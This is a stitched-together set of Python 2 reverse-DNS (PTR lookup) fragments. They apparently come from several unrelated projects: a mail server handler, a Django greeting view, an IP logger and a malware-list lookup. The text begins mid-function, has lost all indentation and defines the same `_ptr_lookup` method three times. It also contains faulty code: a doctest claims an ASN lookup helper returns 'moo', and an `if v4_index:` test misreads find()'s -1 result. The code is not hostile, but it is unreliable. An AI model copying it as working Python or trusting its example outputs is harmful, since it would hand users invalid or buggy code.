# Incluyo las siguientes lineas para dotar de menor tiempo
# de procesamiento de resolucion de dns
resolver = dns.resolver.Resolver()
resolver.timeout = 1
resolver.lifetime = 1
if hostname == '-':
for rdata in resolver.query(address_dns, "PTR"):
hostname = rdata
ips = Ips(
Ip=ip,
Hostname=hostname,
Tag='-',
)
ips.save()
id_ip = ips
except Exception as ex:
print "get_ip -> ", ex
return id_ip
def _ptr_lookup(self, environ):
ip = environ.get('REMOTE_ADDR', '0.0.0.0')
ptraddr = reversename.from_address(ip)
try:
answers = resolver.query(ptraddr, 'PTR')
except DNSException:
answers = []
try:
environ['slimta.reverse_address'] = str(answers[0])
except IndexError:
pass
def get_host_name(self, host, port=0):
# Try IPv6 resolving
try:
socket.inet_pton(socket.AF_INET6, host)
if have_dns:
try:
name = reversename.from_address(host)
name = str(resolver.query(name, 'PTR')[0]).rstrip('.')
log.debug('{0} resolved to {1}'.format(host, name))
return name
except Exception as error:
log.debug('{0} failed to resolve: {1}'.format(host, error))
return host
else:
return host
except socket.error:
pass
# Try IPv4 resolving
try:
socket.inet_pton(socket.AF_INET, host)
if have_dns:
try:
name = reversename.from_address(host)
name = str(resolver.query(name, 'PTR')[0]).rstrip('.')
log.debug('{0} resolved to {1}'.format(host, name))
return name
except Exception as error:
log.debug('{0} failed to resolve: {1}'.format(host, error))
return host
else:
name = socket.gethostbyaddr(host)[0]
if name:
log.debug('{0} resolved to {1}'.format(host, name))
return name
except socket.error:
pass
# Give up
log.debug('{0} failed to resolve: not an IP'.format(host))
return host
def reverse_lookup(self, ip, ns):
"""
Attempt to do a reverse DNS lookup to determine if the control and exp
sets from a positive result resolve to the same domain, in order to
remove false positives due to GeoIP load balancing.
"""
res = resolver.Resolver(configure=False)
res.nameservers = [ns]
n = reversename.from_address(ip)
revn = res.query(n, "PTR").__iter__().next().to_text()[:-1]
return revn
def _OriginRecord(ip):
"""Calculate the hostname to lookup for an IP.
>>> _OriginRecord('8.8.8.8')
'moo'
"""
revname = reversename.from_address(ip).to_text()
v4_index = revname.find('in-addr.arpa.')
if v4_index:
return revname[:v4_index] + 'origin.asn.cymru.com.'
v6_index = revname.find('ip6.arpa.')
if v6_index:
return revname[:v6_index] + 'origin6.asn.cymru.com.'
def _ptr_lookup(self):
try:
ptraddr = reversename.from_address(self.address[0])
try:
answers = resolver.query(ptraddr, 'PTR')
except resolver.NXDOMAIN:
answers = []
try:
self.reverse_address = str(answers[0])
except IndexError:
pass
except Exception:
logging.log_exception(__name__, query=self.address[0])
raise
def reverse_record_exists(ip_address):
"""
Checks if IP address have some reverse record somewhere.
Does not care where it points.
Returns True/False
"""
reverse = reversename.from_address(str(ip_address))
try:
resolver.query(reverse, "PTR")
except DNSException:
# really don't care what exception, PTR is simply unresolvable
return False
return True
def _ptr_lookup(self, environ):
ip = environ.get('REMOTE_ADDR', '0.0.0.0')
try:
ptraddr = reversename.from_address(ip)
try:
answers = dns_resolver.query(ptraddr, 'PTR')
except NXDOMAIN:
answers = []
try:
environ['slimta.reverse_address'] = str(answers[0])
except IndexError:
pass
except Exception:
log_exception(__name__, query=ip)
def lookup(ip, malwarelist):
addr=reversename.from_address(ip)
responses = []
try:
for response in resolver.query(addr, "PTR"):
responses.append(str(response))
except Exception:
pass
if ip in malwarelist:
return '\n '.join(responses), "True"
else:
return '\n '.join(responses), "False"
def index(request):
ip = request.META["REMOTE_ADDR"]
country = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE).country_name_by_addr(ip)
if country:
fr = "from " + country
else:
fr = ""
try:
addr = reversename.from_address(ip)
name = str(resolver.query(addr,"PTR")[0]) + "( " + ip + " ) "
except (resolver.NXDOMAIN, resolver.NoAnswer): # no reverse dns lookup match
name = ip
return HttpResponse("Hello " + name + fr)
def dnsptr(addrtuple,prefix=""):
dnsnames=[]
ip="0.0.0.0"
port="0"
if len(addrtuple)>1:
ip=addrtuple[0]
port=addrtuple[1]
revaddr=reversename.from_address(ip)
try:
dnsnames=sorted([a.to_text().strip('.') for a in resolver.query(revaddr,"PTR").rrset])
except resolver.NXDOMAIN:
pass
addrdict={'%sdnsnames'%prefix:dnsnames,'%sport'%prefix:port,'%sip'%prefix:ip}
return addrdict
